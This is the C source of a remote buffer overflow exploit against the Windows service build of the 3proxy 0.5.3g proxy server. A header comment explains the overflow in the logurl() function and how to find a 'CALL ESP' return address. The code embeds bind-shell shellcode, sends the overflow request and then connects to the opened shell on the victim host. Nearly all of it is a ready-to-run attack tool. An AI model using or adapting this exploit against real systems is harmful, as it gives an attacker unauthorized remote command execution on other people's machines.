/*[ 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit. ]* * * * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) * * * * compile: * * gcc x3proxy-win32.c -o x3proxy-win32 * * * * syntax: * * ./x3proxy-win32 [-pr] -h host * * * * 3proxy homepage/url: * * http://3proxy.ru/ * * * * 3Proxy tiny free proxy server previously known as 3[APA3A] tiny * * freeware proxy. * * * * I just saw a (gentoo) advisory, and got curious how easy it * * would be to exploit this. The vulnerability is fairly * * trival(win32 version): * * * * ----------------------------------------------------------------- * * GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n * * Host: [FILLERx999]\n\n * * ----------------------------------------------------------------- * * * * The length of "Host: [FILLER]" is exactly how many bytes past the * * buffer boundary it will go, if it's not there it won't overflow. * * The vulnerability can be found in proxy.c in the logurl() * * function. (buf[LINESIZE]) * * * * To find the address needed for the EIP overwrite, use * * findjmp.exe(any of the call/jmp addresses found will work): * * * * ----------------------------------------------------------------- * * C:\>findjmp.exe kernel32.dll esp * * Reg: esp * * Scanning kernel32.dll for code usable with the esp register * * 0x7C81518B call esp * * 0x7C8369D8 call esp * * Finished Scanning kernel32.dll for code usable with the esp reg$ * * Found 2 usable addresses * *********************************************************************/ #include #include #ifndef __USE_BSD #define __USE_BSD #endif #include #include #include #include #include #include #include #include #include #include #include #define BUFSIZE 4096 #define TIMEOUT 10 #define DFL_PORT 3128 #define SPORT 7979 /* (WinXP home SP2) */ /* findjmp.exe kernel32.dll esp */ /* ... */ /* 0x7C81518B call esp */ /* ... */ #define DFL_RETADDR 0x7C81518B /* globals. */ /* win32_bind - EXITFUNC=thread LPORT=7979 Size=344 */ /* Encoder=PexFnstenvSub http://metasploit.com */ static char x86_bind[]= "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b" "\x76\x8d\x13\x83\xeb\xfc\xe2\xf4\xb7\x1c\x66\x5e\xa3\x8f\x72\xec" "\xb4\x16\x06\x7f\x6f\x52\x06\x56\x77\xfd\xf1\x16\x33\x77\x62\x98" "\x04\x6e\x06\x4c\x6b\x77\x66\x5a\xc0\x42\x06\x12\xa5\x47\x4d\x8a" "\xe7\xf2\x4d\x67\x4c\xb7\x47\x1e\x4a\xb4\x66\xe7\x70\x22\xa9\x3b" "\x3e\x93\x06\x4c\x6f\x77\x66\x75\xc0\x7a\xc6\x98\x14\x6a\x8c\xf8" "\x48\x5a\x06\x9a\x27\x52\x91\x72\x88\x47\x56\x77\xc0\x35\xbd\x98" "\x0b\x7a\x06\x63\x57\xdb\x06\x53\x43\x28\xe5\x9d\x05\x78\x61\x43" "\xb4\xa0\xeb\x40\x2d\x1e\xbe\x21\x23\x01\xfe\x21\x14\x22\x72\xc3" "\x23\xbd\x60\xef\x70\x26\x72\xc5\x14\xff\x68\x75\xca\x9b\x85\x11" "\x1e\x1c\x8f\xec\x9b\x1e\x54\x1a\xbe\xdb\xda\xec\x9d\x25\xde\x40" "\x18\x25\xce\x40\x08\x25\x72\xc3\x2d\x1e\x92\x38\x2d\x25\x04\xf2" "\xde\x1e\x29\x09\x3b\xb1\xda\xec\x9d\x1c\x9d\x42\x1e\x89\x5d\x7b" "\xef\xdb\xa3\xfa\x1c\x89\x5b\x40\x1e\x89\x5d\x7b\xae\x3f\x0b\x5a" "\x1c\x89\x5b\x43\x1f\x22\xd8\xec\x9b\xe5\xe5\xf4\x32\xb0\xf4\x44" "\xb4\xa0\xd8\xec\x9b\x10\xe7\x77\x2d\x1e\xee\x7e\xc2\x93\xe7\x43" "\x12\x5f\x41\x9a\xac\x1c\xc9\x9a\xa9\x47\x4d\xe0\xe1\x88\xcf\x3e" "\xb5\x34\xa1\x80\xc6\x0c\xb5\xb8\xe0\xdd\xe5\x61\xb5\xc5\x9b\xec" "\x3e\x32\x72\xc5\x10\x21\xdf\x42\x1a\x27\xe7\x12\x1a\x27\xd8\x42" "\xb4\xa6\xe5\xbe\x92\x73\x43\x40\xb4\xa0\xe7\xec\xb4\x41\x72\xc3" "\xc0\x21\x71\x90\x8f\x12\x72\xc5\x19\x89\x5d\x7b\xa4\xb8\x6d\x73" "\x18\x89\x5b\xec\x9b\x76\x8d\x13"; struct{ unsigned int addr; char *host; unsigned short port; }tbl; /* lonely extern. */ extern char *optarg; /* functions. */ char *getbuf(unsigned int); unsigned short proxy_connect(char *,unsigned short); signed int getshell_conn(char *,unsigned short); void proc_shell(signed int); void printe(char *,short); void usage(char *); void sig_alarm(){printe("alarm/timeout hit.",1);} /* start. */ int main(int argc,char **argv){ signed int chr=0,rsock=0; printf("[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflo" "w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)" "\n\n"); tbl.port=DFL_PORT; tbl.addr=DFL_RETADDR; while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){ switch(chr){ case 'h': if(!tbl.host&&!(tbl.host=(char *)strdup(optarg))) printe("main(): allocating memory failed",1); break; case 'p': tbl.port=atoi(optarg); break; case 'r': sscanf(optarg,"%x",&tbl.addr); break; default: usage(argv[0]); break; } } if(!tbl.host)usage(argv[0]); printf("[*] target: %s:%d\n",tbl.host,tbl.port); printf("[*] return address($eip/\"CALL ESP\"): 0x%.8x\n",tbl.addr); proxy_connect(tbl.host,tbl.port); rsock=getshell_conn(tbl.host,SPORT); if(rsock>0)proc_shell(rsock); exit(0); } /* make buf: */ /* "GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n" */ /* "Host: [FILLERx999]\n\n" */ char *getbuf(unsigned int addr){ char *buf; if(!(buf=(char *)malloc(BUFSIZE+1))) printe("getbuf(): allocating memory failed.",1); memset(buf,0,BUFSIZE); strcpy(buf,"GET /"); memset(buf+5,'x',1064); *(long *)&buf[1064+5]=addr; memset(buf+strlen(buf),'\x90',32); strcat(buf,x86_bind); strcat(buf,"\nHost: "); memset(buf+strlen(buf),'x',999); strcat(buf,"\n\n"); return(buf); } /* connects to the vulnerable 3proxy server. */ unsigned short proxy_connect(char *hostname,unsigned short port){ signed int sock; struct hostent *t; struct sockaddr_in s; sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); s.sin_family=AF_INET; s.sin_port=htons(port); printf("[*] attempting to connect: %s:%d.\n",hostname,port); if((s.sin_addr.s_addr=inet_addr(hostname))){ if(!(t=gethostbyname(hostname))) printe("couldn't resolve hostname.",1); memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr)); } signal(SIGALRM,sig_alarm); alarm(TIMEOUT); if(connect(sock,(struct sockaddr *)&s,sizeof(s))) printe("3proxy connection failed.",1); alarm(0); printf("[*] successfully connected: %s:%d.\n",hostname,port); sleep(1); printf("[*] sending string:\n"); printf("[+] GET /[FILLERx1064][EIP/\"CALL ESP\"][NOPSx32]" "[SHELLCODE]\\n\n"); printf("[+] Host: [FILLERx999]\\n\\n\n"); write(sock,getbuf(tbl.addr),BUFSIZE); sleep(1); printf("[*] closing connection.\n\n"); close(sock); return(0); } /* connects to bindshell. */ signed int getshell_conn(char *hostname,unsigned short port){ signed int sock=0; struct hostent *he; struct sockaddr_in sa; if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) printe("getshell_conn(): socket() failed.",1); sa.sin_family=AF_INET; if((sa.sin_addr.s_addr=inet_addr(hostname))){ if(!(he=gethostbyname(hostname))) printe("getshell_conn(): couldn't resolve.",1); memcpy((char *)&sa.sin_addr,(char *)he->h_addr, sizeof(sa.sin_addr)); } sa.sin_port=htons(port); signal(SIGALRM,sig_alarm); printf("[*] attempting to connect: %s:%d.\n",hostname,port); alarm(TIMEOUT); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){ printf("[!] connection failed: %s:%d.\n",hostname,port); exit(1); } alarm(0); printf("[*] successfully connected: %s:%d.\n\n",hostname,port); return(sock); } /* process the bind shell. */ void proc_shell(signed int sock){ signed int r=0; char buf[4096+1]; fd_set fds; signal(SIGINT,SIG_IGN); while(1){ FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sock,&fds); if(select(sock+1,&fds,0,0,0)<1) printe("getshell(): select() failed.",1); if(FD_ISSET(0,&fds)){ if((r=read(0,buf,4096))<1) printe("getshell(): read() failed.",1); if(write(sock,buf,r)!=r) printe("getshell(): write() failed.",1); } if(FD_ISSET(sock,&fds)){ if((r=read(sock,buf,4096))<1)exit(0); write(1,buf,r); } } close(sock); return; } /* error! */ void printe(char *err,short e){ printf("[!] %s\n",err); if(e)exit(1); return; } /* usage. */ void usage(char *progname){ printf("syntax: %s [-pr] -h host\n\n",progname); printf(" -h \ttarget hostname/ip.\n"); printf(" -p \ttarget port.\n"); printf(" -r \tdefine return/\"CALL ESP\" address. (0x%.8x)\n\n",tbl.addr); exit(0); }